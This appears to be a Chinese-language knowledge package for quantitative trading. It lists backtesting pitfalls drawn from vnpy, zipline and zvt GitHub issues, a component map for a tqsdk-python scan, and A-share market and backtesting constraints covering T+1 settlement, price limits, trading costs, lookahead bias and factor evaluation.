vnpy Alpha 模块在保存 K 线数据到 Parquet 文件时，将新下载数据（可能含 Float64 列）与已存文件（历史 Int64 列）直接 polars.concat。polars 强类型 不允许隐式类型提升，抛出 SchemaError。根因是不同数据源/版本返回的字段类型 不一致（如 volume 在部分行情源为整数，在另一些为浮点），且 concat 前无 schema 对齐步骤。影响所有使用 vnpy alpha 进行回测的历史数据构建流程。

Source: https://github.com/vnpy/vnpy/issues/3669

### `AP-VNPY-3685` — 价差交易模块 run_backtesting() 在 Jupyter 环境下静默报错，结果不可信 <sub>(high)</sub>

vnpy 4.10 价差交易（SpreadTrading）模块的 run_backtesting() 在 Jupyter 环境下存在事件循环冲突（asyncio already running），导致回测引擎部分逻辑 不执行但不抛异常，返回看似正常的回测统计数据。同样代码在命令行 Python 中无此问题。vnpy 4.x 将部分 IO 改为 async 但 Jupyter 的事件循环与之不兼容， 是"回测结果看起来正确但实际不完整"的隐蔽陷阱。

Source: https://github.com/vnpy/vnpy/issues/3685

### `AP-VNPY-3700` — 安装脚本不使用 venv 导致全局 numpy 版本被降级破坏其他依赖 <sub>(medium)</sub>

vnpy install.bat 直接在系统/conda base 环境安装，会强制降级 numpy 到 <2.0 以满足 vnpy 依赖，破坏依赖 numpy 2.x 的其他量化工具（如 scipy、pytorch 新版）。 没有 requirements.txt，依赖边界不透明。在多工具共存的量化研究环境中， vnpy 的安装脚本是"全局环境污染"的常见根源。

Source: https://github.com/vnpy/vnpy/issues/3700

## zipline (6)

### `AP-ZIPLINE-138` — 回测价格为未复权价，教程图表误导用户误判策略收益 <sub>(high)</sub>

Zipline 教程使用 AAPL 股价图做演示，但 bundle 中存储的是未复权价格（raw price）， 而非经过拆股/分红调整的复权价。图表显示的历史价格与市场实际价约差 4 倍（Apple 历次拆股累计因子），用户误将"价格翻 4 倍"当作策略收益。A 股场景更严重： 除权前后价格跳变会在未复权数据中形成巨大"信号"，吸引技术指标在除权日产生 虚假突破信号。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/138

### `AP-ZIPLINE-235` — 默认以当根 K 线收盘价成交，低估实盘滑点，策略回测收益虚高 <sub>(high)</sub>

Zipline 默认滑点模型在当根 K 线触发信号后，以同根 K 线收盘价成交（current bar close fill）。实盘中信号只能在下一根 K 线的开盘价附近成交（T+1 order execution）。以 A 股日线为例，用收盘价回测比用次日开盘价成交平均高估日收益 约 0.1-0.3%，年化差距可超 30%。需显式配置 slippage model 为 VolumeShareSlippage 或 FixedSlippage 并设合理 volume_limit。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/235

### `AP-ZIPLINE-190` — 日历 start_session 设为非交易日触发 DateOutOfBounds，无提示如何修正 <sub>(medium)</sub>

Zipline 在注册 bundle 或运行算法时，若 start_session 参数恰好是非交易日 （如 1998-01-01 元旦），Calendar 校验抛出 DateOutOfBounds（"cannot be earlier than the first session"）。错误信息仅显示交易日历起始日，不提示"请改为第一个 交易日"。A 股场景：使用 SSE/SZSE 日历时，若 start_date 恰好是春节前最后 一天次日（节假日），会触发同类错误，调试成本极高。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/190

### `AP-ZIPLINE-181` — asset db 过期后 Pipeline 报"no assets traded"，误导用户排查数据范围 <sub>(high)</sub>

Zipline 的 asset database（SQLite）记录每只股票的 start/end 交易日期。若 使用了旧版 Quandl/自建 bundle 且未重新 ingest，在回测新日期范围时 Pipeline 抛出 "Failed to find any assets with country_code 'US' that traded between [dates]"。A 股场景：重新下载行情后若只更新价格数据而未重建 asset db，退市/ 新上市股票的日期范围不更新，Pipeline 过滤会悄悄排除这些股票，产生生存者偏差。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/181

### `AP-ZIPLINE-285` — week_start()/week_end() 在自定义日历（非美股）下静默失效 <sub>(medium)</sub>

Zipline schedule_function 的 date_rules.week_start() 和 date_rules.week_end() 依赖交易日历的周首/周末判断逻辑，但在非美股日历（如 ASX、SSE）中，该逻辑 与 NYSE 日历的偏移计算不兼容，导致 schedule 永远不触发或在错误的日期触发。 A 股场景：使用 SSE 日历时，含春节等连续长假的周，week_start 可能跳过整个 假期周而不调仓，但用户无法从日志发现未触发的调度。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/285

### `AP-ZIPLINE-240` — 回测日期时区必须为 UTC，传入 naive datetime 引发深层 AssertionError <sub>(medium)</sub>

Zipline 内部强制要求所有时间戳为 UTC aware datetime。当用户传入 naive datetime （无时区信息，如 pd.Timestamp('2020-01-01')）时，不在入口处报错，而是在 算法执行深处触发 AssertionError: Algorithm should have a utc datetime，栈深 难以定位。A 股开发者从本地 CST 时间导入数据时极易触发此陷阱，需在 bundle 注册时显式 tz_localize('UTC')。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/240

## zvt (6)

### `AP-ZVT-183` — 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败 <sub>(high)</sub>

ZVT 在计算前复权因子时以 new/old 价格比计算 qfq_factor。当 old==0（新股首日 或数据缺失）时因子为 inf；当 kdata.open 本身为 None（停牌日未填充）时乘法 抛出 TypeError。结果：整个 entity 的复权计算中断，后续 K 线全部丢失，但主 流程只 log ERROR 不中断，用户往往不知道已有大量股票数据损坏。

Source: https://github.com/zvtvz/zvt/issues/183

### `AP-ZVT-179` — 第三方数据接口超限后异常被吞噬，数据静默缺失 <sub>(high)</sub>

ZVT 使用聚宽 jqdatasdk 批量拉取全市场 K 线时（4000+ 股票），触发聚宽每日 最大查询条数限制（错误：已超过每日最大查询数量）。ZVT 捕获异常后继续执行下一 entity，导致超限后所有股票的当日数据均静默缺失。回测若使用该残缺数据库，因 子计算结果将产生系统性偏差，且无告警。

Source: https://github.com/zvtvz/zvt/issues/179

### `AP-ZVT-161` — 全市场 SQLite 批量因子计算触发 too many SQL variables 错误 <sub>(medium)</sub>

ZVT 在计算 VolumeUpMaFactor 等多股因子时，将所有 entity_id 拼入单条 SQL 的 IN 子句。当 A 股全市场（5000+ 股）一次性查询时，触发 SQLite 默认限制 SQLITE_MAX_VARIABLE_NUMBER=999。调大 max_allowed_packet（MySQL 参数）无效， 根因是 SQLite 变量数上限。正确解法是分批查询，但 ZVT 早期版本未处理此边界。

Source: https://github.com/zvtvz/zvt/issues/161

### `AP-ZVT-129` — 使用通配符导入隐藏 API 版本变更，AdjustType 等枚举莫名消失 <sub>(medium)</sub>

ZVT 文档示例使用 `from zvt import *` 导入所有符号。当 ZVT 版本升级重构 枚举（如将 AdjustType 移入子模块）后，通配符导入不再包含该符号，触发 AttributeError。使用者误以为是安装问题，实际是版本间 API breaking change 未在 CHANGELOG 中标注，且通配符导入掩盖了具体来源。应显式 import 枚举类。

Source: https://github.com/zvtvz/zvt/issues/129

### `AP-ZVT-187` — 回测引擎未在数据层空结果时提前终止，导致空指针级联崩溃 <sub>(medium)</sub>

ZVT Trader 在 load_data 完成后检查数据为空时，不提前退出，而是将空 DataFrame 传入 selector 计算，触发后续 NoneType 操作链式崩溃。错误栈深且难以定位根因， 用户误以为是策略逻辑问题。根因是数据时间窗口配置错误（start/end 不在数据 库覆盖范围内）但无有效校验。

Source: https://github.com/zvtvz/zvt/issues/187

### `AP-ZVT-183B` — HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移 <sub>(high)</sub>

ZVT 提供 Stock1dKdata（不复权）、Stock1dHfqKdata（后复权）、Stock1dQfqKdata （前复权）三张独立表。用户在计算价格动量/均线因子时混用两张表（如用不复权 做均线，用后复权做收益率），导致除权日前后因子值产生跳变。ZVT 不做跨表 复权类型一致性校验，混用静默通过。

Source: https://github.com/zvtvz/zvt/issues/183

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-069--tqsdk-python
**Scan date**: 2026-04-22
**Stats**: {'total_files': 7, 'total_classes': 44, 'total_functions': 0, 'total_stages': 7}

## Modules (7)

- [websocket_connection_management](components/websocket_connection_management.md): 6 classes
- [in-memory_data_store_&_diff_protocol](components/in-memory_data_store_-_diff_protocol.md): 5 classes
- [api_entry_point_&_task_scheduling](components/api_entry_point_-_task_scheduling.md): 7 classes
- [market_data_simulation_&_backtest](components/market_data_simulation_-_backtest.md): 6 classes
- [trading_algorithms_&_position_management](components/trading_algorithms_-_position_management.md): 7 classes
- [order_execution_&_matching](components/order_execution_-_matching.md): 7 classes
- [tradeable_account_abstraction](components/tradeable_account_abstraction.md): 6 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 75
  fatal_constraints_count: 37
  non_fatal_constraints_count: 173
  use_cases_count: 2
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (71)

- **`SHARED-CN-ASTOCK-T1-001`** <sub>(fatal)</sub>: A 股股票实行 T+1 交收制度：T 日买入的股票最早 T+1 日方可卖出。 T 日卖出所得资金可当日再用于买入。回测框架若未施加 T+1 持仓锁定， 将高估换手率与策略胜率，尤其损害日内反转类策略的真实性。
- **`SHARED-CN-ASTOCK-T1-002`** <sub>(fatal)</sub>: 沪深主板股票日涨跌幅上限为 ±10%（ST/SST 股票 ±5%）。 涨停封板时买方消失、跌停封板时卖方消失；回测若假设当日可以任意价格 成交，会系统性高估可执行性。封板检测应在成交模拟层强制实施。
- **`SHARED-CN-ASTOCK-T1-003`** <sub>(high)</sub>: 科创板和创业板（2020年8月改革后）正常交易日涨跌幅为 ±20%； 北交所 ±30%；新股上市后前5个交易日不设涨跌幅限制。 回测若对所有股票统一套用 ±10% 过滤逻辑，会错误剔除或错误包含这些板块的成交。
- **`SHARED-CN-ASTOCK-T1-004`** <sub>(high)</sub>: ST/*ST 股票日涨跌幅限制为 ±5%，流动性极差，成交假设不可与正常股票混用。 包含历史 ST 股票（最终退市）但不纳入回测会产生幸存者偏差； 纳入回测但不区分 ST 涨跌幅会错误模拟成交。
- **`SHARED-CN-ASTOCK-T1-005`** <sub>(medium)</sub>: A 股开盘集合竞价（9:15-9:25）和收盘集合竞价（14:57-15:00）期间， 成交价由"最大成交量原则"确定，非即时撮合。回测以开盘价或收盘价假设 即时全量成交会低估实际滑点风险，大单策略尤为明显。
- **`SHARED-CN-ASTOCK-T1-006`** <sub>(high)</sub>: 停牌制度：A 股长期停牌（2018年前可长达数月）期间，持仓资金被锁定， 无法再平衡，机会成本在回测中普遍被忽略。应在因子计算前过滤停牌日 （volume == 0 或 is_suspended == True），停牌期间不发出信号。
- **`SHARED-CN-ASTOCK-T1-007`** <sub>(high)</sub>: 新股上市后前5个交易日无涨跌幅限制（首日涨幅可超300%）， 且无完整历史数据（均线/波动率/换手率因子无法计算）。 应在因子计算前过滤上市不足 N 个交易日（通常 60-252 日）的股票。
- **`SHARED-CN-ASTOCK-T1-008`** <sub>(high)</sub>: A 股程序化交易监管新规（2025年7月7日施行）：单账户每秒申报/撤单 ≥ 300 笔， 或单日申报/撤单 ≥ 20000 笔，被认定为高频交易，须向交易所报备。 AI 生成的量化策略若频率超标则无法合规运行，应在策略设计期提示。
- **`SHARED-CN-ASTOCK-ADJ-001`** <sub>(fatal)</sub>: 除权除息日股价跳空是账面调整而非真实亏损。复权选择： 不复权会虚增策略亏损；前复权会将历史价格内嵌未来分红信息（lookahead bias）； 后复权以上市首日为基准累积，是量化回测的最优选择。
- **`SHARED-CN-ASTOCK-ADJ-002`** <sub>(fatal)</sub>: A 股上市公司财务报告披露有法定延迟：年报在次年4月30日前、 半年报在8月31日前、季报分别在4月30日（一季）/10月31日（三季）前披露。 回测中使用财务数据时，必须以实际披露日期（announcement_date）而非 会计期间结束日作为数据可用时间点，否则引入 point-in-time lookahead bias。
- **`SHARED-CN-ASTOCK-ADJ-003`** <sub>(high)</sub>: 分红送股转增和配股会导致除权除息日后股本增加，历史持股数量不变但股价等比 缩水，若回测系统未同步调整持仓股数，会在除权日产生虚假亏损或盈利。
- **`SHARED-CN-ASTOCK-ADJ-004`** <sub>(medium)</sub>: 大宗交易与竞价交易价差：大宗交易成交价可比市价折价最多 10%（主板）， 但此价格不影响次日竞价开盘。大宗交易数据出现在收盘后，若将其混入 日内 OHLCV 数据，会污染收盘价和成交量的正常计算。
- **`SHARED-CN-ASTOCK-ADJ-005`** <sub>(fatal)</sub>: 融资融券（两融）做空限制：A 股散户无法直接卖空，融券标的池有限（主要为 大盘蓝筹，中小盘融券极度稀缺），融券利率远高于融资利率。 回测若直接假设可做空任意股票，会产生不可执行的策略，实盘与回测严重背离。
- **`SHARED-CN-ASTOCK-FX-001`** <sub>(high)</sub>: 通过沪深港通（北向）买入股票，境外投资者合计持股上限 30%，预警线 28%。 当外资持股比例达 28% 时，联交所暂停该股新增买盘，直到降至 26% 才恢复。 策略若重仓外资偏好股（消费/医药龙头），需监控外资持股比例。
- **`SHARED-CN-ASTOCK-FX-002`** <sub>(high)</sub>: 5% 举牌规则：单一投资者持有上市公司已发行股份超过 5%，须在3日内向证监会 和交易所报告并公告；在此期间及公告后2日内不得再买卖。 量化选股系统若不考虑此规则，重仓股超过 5% 阈值后将面临强制停止买入。
- **`SHARED-CN-ASTOCK-FX-003`** <sub>(high)</sub>: 公募基金"双十原则"：单基金持有单只股票不超过净资产 10%， 同一基金管理人旗下所有基金合计不超过该公司已发行股份 10%。 量化选股组合若部署于公募基金，需在优化约束中强制加入合规上限。
- **`SHARED-CN-ASTOCK-FX-004`** <sub>(fatal)</sub>: 内幕交易边界：AI 辅助量化系统的所有输入数据必须来自公开已披露信息。 通过非公开渠道（私有数据服务/内部消息/重组前预知）触发的自动化交易 构成内幕交易，适用《证券法》第80-83条及《内幕交易行为认定指引》。
- **`SHARED-CN-ASTOCK-MKT-001`** <sub>(fatal)</sub>: 幸存者偏差：使用当前 A 股成分股（如当前沪深300）作为历史回测股票池， 会遗漏曾被纳入指数但因业绩差被调出或退市的股票。2020-2024年 A 股 退市数量加速（41家/年创纪录），此偏差日趋严重。必须使用历史时点快照。
- **`SHARED-CN-ASTOCK-MKT-002`** <sub>(medium)</sub>: 指数成分股调整效应：沪深300/中证500等每半年调整一次（6月/12月）， 被纳入股票通常在公告日至生效日之间显著上涨（被动资金被动买入）， 被剔除股票则相反。回测股票池应使用历史成分股快照，并标注调整窗口期。
- **`SHARED-CN-ASTOCK-MKT-003`** <sub>(high)</sub>: 策略拥挤（Strategy Crowding）：大量量化私募使用相似因子模型时， 持仓高度重叠，遇市场冲击时集体卖出形成踩踏。2024年2月 A 股量化危机 是典型案例（小盘股指数单日跌幅超 10%）。需监控因子多头持仓与 主流量化基金的重叠率。
- **`SHARED-CN-ASTOCK-MKT-004`** <sub>(high)</sub>: A 股量化对冲策略常用 IF/IC/IM 股指期货做多/空对冲系统性风险。 但 A 股股指期货长期处于贴水（远期价格 < 现货），IC 年化贴水可达 10-20%。 回测若仅考虑价格收益而忽略期货贴水/升水，会严重高估对冲策略净收益。
- **`SHARED-CN-ASTOCK-MKT-005`** <sub>(high)</sub>: A 股月度动量因子在方向上与美股相反：近1个月表现最好的股票， 下1个月大概率反转（反转效应而非动量）。机构研究（华泰/东吴证券） 与学术论文均验证：直接套用美股月度动量因子在 A 股会产生系统性亏损。
- **`SHARED-CN-ASTOCK-BF-001`** <sub>(medium)</sub>: 处置效应（Shefrin & Statman 1985）在 A 股散户中尤为显著： 投资者倾向于过早卖出盈利股票、过长持有亏损股票。上交所实证研究证实 超过 90% 的个人账户存在此效应，AI 辅助工具不应迁就"持有亏损等解套" 的直觉，而应基于量化信号提供纪律性止损止盈建议。
- **`SHARED-CN-ASTOCK-BF-002`** <sub>(medium)</sub>: A 股以散户为主（个人账户交易量占比超 80%），羊群效应显著：散户倾向于 跟风操作，导致价格非理性波动（如 2015年杠杆牛熊）。量化策略应避免 使用成交量排行/热度排行等可能强化羊群信号的指标作为主要因子。
- **`SHARED-CN-ASTOCK-BF-003`** <sub>(medium)</sub>: 过度自信效应（Barber & Odean 2000）在 A 股散户中更严重：散户年均换手率 超 500%，机构长期收益显著优于散户。高换手率策略经交易成本后净收益往往 更低。AI 不应鼓励"频繁操作"，而应推荐低频高质信号驱动交易。
- **`SHARED-CN-ASTOCK-BF-004`** <sub>(medium)</sub>: A 股日历效应：春节效应（节前5日和节后1-3日倾向上涨）、月初效应 （月初第1-5个交易日表现优于月中/月末）已有学术实证（南京财经大学等）。 策略应在日历特殊窗口降低信号置信度，或单独评估日历驱动收益的贡献。
- **`SHARED-CN-ASTOCK-BF-005`** <sub>(high)</sub>: 策略容量（Capacity）限制：A 股小盘/微盘股日均成交额仅数百万， 大资金买入/卖出会造成严重价格冲击，策略实际容量可能仅几千万元。 回测结果不可外推至亿级资金，应在回测中加入成交量比例上限约束。
- **`SHARED-CN-ASTOCK-COST-001`** <sub>(fatal)</sub>: A 股完整交易成本结构（2023年8月调整后）：印花税卖出单向 0.05%； 佣金双向约 0.01%（最低5元）；过户费（沪市）0.001%； 滑点/冲击成本小盘股 0.1%-0.5%/次。忽略成本的回测策略年化收益率 具有欺骗性，高频/高换手策略尤甚。
- **`SHARED-CN-ASTOCK-COST-002`** <sub>(high)</sub>: 市场冲击成本（Market Impact）在回测中通常完全缺失，但在实盘中可能是 最大成本来源。A 股小盘股 100 万元买入可能推高 1% 以上。冲击成本与 成交规模呈幂律而非线性关系，应使用 Almgren-Chriss 模型或简化版估算。
- **`SHARED-CN-ASTOCK-COST-003`** <sub>(medium)</sub>: 大股东/董监高减持新规（证监会第224号令，2024年5月）：持股5%以上大股东 通过集中竞价减持须提前15个交易日披露减持计划，3个月内不超过股份总数1%。 解禁股减持压力是 A 股特有的系统性风险因子，回测中忽略解禁日历会低估 相关股票的持股风险。
- **`SHARED-CN-ASTOCK-DATA-001`** <sub>(high)</sub>: A 股交易日历与自然日历不一致：存在法定节假日调休导致的"补班日"（周六上班）， 以及临时停市（2015年7月8日至7月10日因股灾紧急停市）。 使用通用工作日历（weekdays）推算 A 股交易日会产生偏差， 必须使用 A 股专用交易日历（如 exchange_calendars 或 tushare 的交易日接口）。
- **`SHARED-CN-ASTOCK-DATA-002`** <sub>(medium)</sub>: A 股退市后股票代码可能被新股重用（极少见但存在）。使用纯代码（如 '000001'） 作为历史数据主键而不包含交易所后缀（'.SZ'）或上市日期范围，可能导致 历史数据与当前股票的错误混淆，长周期回测中需特别注意。
- **`SHARED-BT-LAB-001`** <sub>(fatal)</sub>: 未来函数（Lookahead Bias）：在模拟历史时间点 t 的交易决策时， 不得使用 t 时刻之后才能知道的信息。最常见形式： (1) 使用收盘价计算信号并同日以收盘价成交； (2) 将 T 日收盘后计算的指标标记在同一根 K 线； (3) 使用当日最高/最低价作为成交假设。 信号计算与成交时间必须对齐：T 日收盘后计算信号，T+1 日开盘成交。
- **`SHARED-BT-LAB-002`** <sub>(high)</sub>: 指标预热期（Warmup Period）处理：滚动窗口指标在前 N 个 bar 时 NaN， 这些 bar 不应参与信号计算和持仓决策。强制要求指标的 warmup_period 与最长 lookback 期等长，且 warmup 期间持仓应置零。
- **`SHARED-BT-LAB-003`** <sub>(fatal)</sub>: ML/DL 模型时序数据划分必须按时间顺序：TRAIN < VALID < TEST， 不可使用随机 k-fold 分折（会将未来数据混入训练集）。 应使用 TimeSeriesSplit 或 Walk-Forward 验证。
- **`SHARED-BT-LAB-004`** <sub>(fatal)</sub>: 开盘价/最高价/最低价成交假设：日线回测中假设每日可以最高价卖出或 最低价买入（如动量策略"最高价止盈"），这是明显的 lookahead， 因为日内最高/最低价只有收盘后才能确认。成交价只能用开盘价或 前一日收盘价（带滑点）。
- **`SHARED-BT-LAB-005`** <sub>(high)</sub>: 数据对齐偏移（Off-by-one）：pandas rolling/shift 等操作容易引入细微的 1 期偏移错误。应在代码中明确记录每个序列的"观测时间点"， 并通过 assert 验证关键时间对齐关系。
- **`SHARED-BT-LAB-006`** <sub>(high)</sub>: 过度优化（Overfitting）：回测数量越多，过拟合概率越高。 Bailey et al.（2014）证明 Optimal Sharpe Ratio 期望值随回测次数单调递减。 应使用 Walk-Forward 验证代替 in-sample 参数穷举，并报告 Deflated Sharpe Ratio（DSR）而非峰值 Sharpe。
- **`SHARED-BT-SURV-001`** <sub>(fatal)</sub>: 幸存者偏差（Survivorship Bias）：使用当前市场成分股作为历史回测股票池， 会遗漏曾经存在但后来退市、摘牌或被合并的股票，系统性高估策略历史收益率。 回测股票池必须使用历史时点快照（point-in-time universe）。
- **`SHARED-BT-SURV-002`** <sub>(high)</sub>: In-Sample / Out-of-Sample 划分：策略开发、参数选择必须在样本内完成， 样本外数据仅用于最终验证，不可多次"看"样本外数据后继续调优 （会将样本外变为新的样本内，重蹈过拟合）。
- **`SHARED-BT-SURV-003`** <sub>(high)</sub>: 停牌/缺失数据的填充策略：停牌日价格不可简单用前一日收盘价 forward-fill， 因为这会在复盘时造成"零成交量"日参与了因子计算和信号生成。 应在因子计算层显式过滤缺失交易日，不填充。
- **`SHARED-BT-SURV-004`** <sub>(high)</sub>: 异常值（Extreme Value）污染：原始市场数据可能含有数据源错误（如除权未 及时调整、手工录入错误导致的极端价格），不清洗直接进入因子计算会产生 极端信号，污染整个横截面。应在 pipeline 入口处过滤 3-sigma 异常值。
- **`SHARED-BT-COST-001`** <sub>(fatal)</sub>: 交易成本（佣金 + 印花税/转让税 + 过户费）必须在回测初始化时强制配置， 不可使用零成本默认值。忽略成本的回测策略绩效指标具有欺骗性， 高换手率策略尤其严重（单边往返成本往往吞噬 50%+ 的毛收益）。
- **`SHARED-BT-COST-002`** <sub>(high)</sub>: 滑点（Slippage）建模：回测若无滑点，假设每笔订单以理想价格成交， 高频策略在实盘中会因成交价劣化而产生严重亏损。至少应配置固定点差 或比例滑点；大单应使用成交量比例模型（如不超过日成交量 5%）。
- **`SHARED-BT-COST-003`** <sub>(high)</sub>: 换手率（Turnover）必须在回测绩效报告中展示并与成本关联分析。 月换手率超过 50%（年化 600%+）时，策略净收益对成本假设极度敏感， 每 10bps 成本变化可能改变策略盈亏结论，必须做成本敏感性分析。
- **`SHARED-BT-COST-004`** <sub>(medium)</sub>: 仓位规模化（Position Sizing）必须纳入资金量约束：回测应模拟固定资金量 下的实际持仓股数（取整），而非假设可以持有小数股。 对小盘股，最小交易单位（A股：100股/手）会导致实际可持仓量与目标权重 产生偏差，应在回测中模拟取整效应。
- **`SHARED-BT-TIME-001`** <sub>(high)</sub>: 时间戳时区统一：多数据源合并时，UTC vs 本地时间混用是常见数据腐败源。 所有时间戳必须在 pipeline 入口处统一转换为同一时区（推荐 UTC 存储， 市场本地时区展示），不可在 pipeline 中途混用不同时区。
- **`SHARED-BT-TIME-002`** <sub>(high)</sub>: 交易日历对齐：合并不同市场或不同频率数据时（如日线价格 + 周频因子）， 必须使用明确的交易日历进行 reindex/merge，不可使用 outer join 后 fillna， 否则会在非交易日（节假日）创建虚假数据行。
- **`SHARED-BT-TIME-003`** <sub>(high)</sub>: 增量更新边界校验：历史数据增量更新时，必须从数据库查询已存最新日期， 仅下载该日期之后的数据。若重新下载已有数据并追加，会产生时间戳重复行， 导致回测时序错误。更新前后必须校验无重复 (index.duplicated().any() == False)。
- **`SHARED-BT-TIME-004`** <sub>(medium)</sub>: 回测绩效归因失真：基准（Benchmark）选择不当会使 Alpha/Beta 计算失真。 应选用策略实际可投资的被动基准（如 HS300 ETF），而非不可直接投资的 价格指数（如 HS300 指数）。价格指数不含股息再投资，会低估持仓基准收益。
- **`SHARED-BT-PERF-001`** <sub>(medium)</sub>: 最大回撤（Max Drawdown）计算必须使用净值序列（portfolio value）， 不可用累计收益率序列代替。若使用对数收益率累加，会低估回撤深度 （因对数收益率在下跌时会比简单收益率偏小）。
- **`SHARED-BT-PERF-002`** <sub>(medium)</sub>: Sharpe Ratio 年化化约定：年化 Sharpe = 日 Sharpe × sqrt(252)（股票，252 交易日） 或 × sqrt(365)（加密货币，365日）。不同系统默认不同，跨系统对比前必须 确认年化因子，否则 Sharpe 不可比。
- **`SHARED-BT-PERF-003`** <sub>(medium)</sub>: Calmar Ratio / Sortino Ratio 优于 Sharpe Ratio 作为风险调整收益指标： Sharpe 假设收益正态分布，A 股/加密市场的收益分布显著左偏（肥尾）， 会低估下行风险。量化评估应同时报告 Sortino（仅下行波动）和 Calmar（年化收益/最大回撤），不应单一依赖 Sharpe。
- **`SHARED-BT-PERF-004`** <sub>(medium)</sub>: 回测绩效归因应拆解为：alpha（主动收益）、beta（市场收益）、 因子暴露收益（style/sector）和特异性收益（stock selection）。 不做归因的回测无法区分"策略优秀"与"顺风行情恰好 beta 对了"。
- **`SHARED-FR-IC-001`** <sub>(high)</sub>: IC（信息系数）是衡量因子预测能力的核心指标，定义为因子值与 下期收益率的 Spearman 秩相关系数（ICIR = IC / std(IC)）。 IC 绝对值 > 0.05 视为有预测能力的初步证据，ICIR > 0.5 视为稳定。 不计算 IC 直接报告回测绩效是因子有效性证明缺失的典型问题。
- **`SHARED-FR-IC-002`** <sub>(high)</sub>: IC 衰减（IC Decay）分析：因子预测能力通常随持仓期增长而衰减。 应计算 1/5/10/20 日 IC 序列，识别因子的最优持仓期。 IC 在1日高但20日迅速衰减的因子是短期因子，不适合月度换仓策略； 反之亦然。使用错误的持仓期会严重损害因子实盘表现。
- **`SHARED-FR-IC-003`** <sub>(high)</sub>: Harvey, Liu & Zhu (2016) 警告：学术界已发现 300+ 个"显著"因子， 其中大量是多重检验下的误发现（False Discovery）。因子有效性要求： t-stat > 3.0（而非传统的 1.96）；或在不同时段/市场独立复现； 或有清晰的经济学逻辑。不满足上述条件的因子极可能是数据挖掘产物。
- **`SHARED-FR-IC-004`** <sub>(high)</sub>: 因子换手率（Factor Turnover）控制：高 IC 但高换手率的因子，在扣除 交易成本后净 IC 可能为负。应计算换手率调整后的有效 IC： net_IC = IC - turnover × cost_per_turn。目标换手率 ≤ 50%（月频）。
- **`SHARED-FR-IC-005`** <sub>(medium)</sub>: 因子衰减期（Half-life）是因子信号强度的核心参数，直接决定最优再平衡频率。 半衰期 < 5 日：日频或周频换仓；5-20 日：周频或双周；> 20 日：月频换仓。 错误地对短期因子使用月频换仓，会导致大量 alpha 在持仓期内消散。
- **`SHARED-FR-NEUT-001`** <sub>(high)</sub>: 行业中性化（Industry Neutralization）：因子值若不对行业均值中性化， 因子收益中会混入行业轮动收益，难以判断是因子本身还是行业暴露驱动了收益。 行业中性化操作：factor_neutral = factor - industry_mean(factor)。
- **`SHARED-FR-NEUT-002`** <sub>(high)</sub>: 市值中性化（Market Cap Neutralization）：小盘股效应（小盘跑赢大盘） 是金融史上最持久的 anomaly 之一，会污染几乎所有未中性化的因子。 若因子与市值高度相关，选股会系统性偏向小盘，收益来自市值暴露而非因子本身。 需同时进行行业和市值中性化（Fama-MacBeth 回归或残差法）。
- **`SHARED-FR-NEUT-003`** <sub>(high)</sub>: 异常值处理（Winsorize/MAD）：因子原始值通常含有极端值，极端值会扭曲 分组分析（如 Q1/Q10 十分位）。应对原始因子值做 Winsorize（截尾至 [1%, 99%] 或 3-sigma）或 MAD（中位数绝对偏差）缩尾，然后再排名/中性化。
- **`SHARED-FR-NEUT-004`** <sub>(medium)</sub>: 因子正交化（Factor Orthogonalization）：当多个因子共同用于合成打分时， 高相关因子的合成等效于对单一因子过度权重，稀释信号多样性。 应在合成前对因子做施密特正交化或 PCA，消除因子间的多重共线性。
- **`SHARED-FR-NEUT-005`** <sub>(medium)</sub>: 缺失数据填充策略：因子计算中的 NaN（停牌/新股/数据缺口）若用截面均值填充 会引入 lookahead bias（均值本身含未来信息）；若完全删除会产生幸存者偏差； 正确做法是用截面中位数（当日所有股票的中位数，不依赖未来）或将该股当日排除。
- **`SHARED-FR-PORT-001`** <sub>(high)</sub>: 分层分析（Quantile Analysis）：因子评估应使用 Q1/Q5（五分位）或 Q1/Q10（十分位）分组的多空收益差（top minus bottom spread）作为 主要评估指标，而非简单的多头收益。Q1 多 Q5 空的"单调性"检验是 因子有效性的核心证据：单调递增/递减 > 非单调 >> 仅多头有效。
- **`SHARED-FR-PORT-002`** <sub>(medium)</sub>: Alpha 衰减测试（Alpha Decay Test）：因子的月度 IC 在不同时段（牛市/熊市/ 震荡市）的稳定性是因子鲁棒性的重要证据。IC 仅在某个特定市场状态下有效 的因子不适合全天候部署；应分段（rolling 12M）展示 IC 时序， 识别因子失效期。
- **`SHARED-FR-PORT-003`** <sub>(medium)</sub>: 换仓成本感知（Turnover-Aware Selection）：因子排名靠近中间地带（49-51 分位） 的股票，排名小幅波动就会触发换仓，产生大量无效交易成本。 应在选股时设置换仓缓冲区（buffer zone）：只在排名变化超过阈值时才换仓。
- **`SHARED-FR-PORT-004`** <sub>(medium)</sub>: 分组收益的统计显著性（Bootstrap 检验）：因子分层收益差（Q1-Q5 spread） 即使在历史数据上很大，也可能是偶然，需要 bootstrap 或 t-test 检验 显著性（p-value < 0.05）。小样本回测期（< 3年）的分层收益尤其不可靠。
- **`SHARED-FR-XFER-001`** <sub>(high)</sub>: 因子跨市场可移植性验证：在一个市场有效的因子，不必然在另一个市场有效。 将美股因子直接套用 A 股、或将股票因子套用期货/加密货币，需要独立 IC 验证， 不可假设跨市场通用性。A 股特有异象（如反转效应、ST 价格异常）不存在于美股。
- **`SHARED-FR-XFER-002`** <sub>(medium)</sub>: 因子有效性时间稳定性：曾经有效的因子会因市场学习和套利行为逐渐失效 （McLean & Pontiff 2016 证明因子发表后平均衰减 58%）。 应定期（每季度/年）重新评估因子 IC，失效因子应及时替换或降权。
- **`SHARED-FR-XFER-003`** <sub>(medium)</sub>: 因子与宏观经济环境的交互：利率周期/经济周期/市场情绪对因子有效性影响显著。 价值因子（低 P/B）在利率上升期更有效；动量因子在趋势市更有效，震荡市失效。 部署因子前应评估当前宏观环境与因子最优生存环境的匹配度。

FILE:references/LOCKS.md
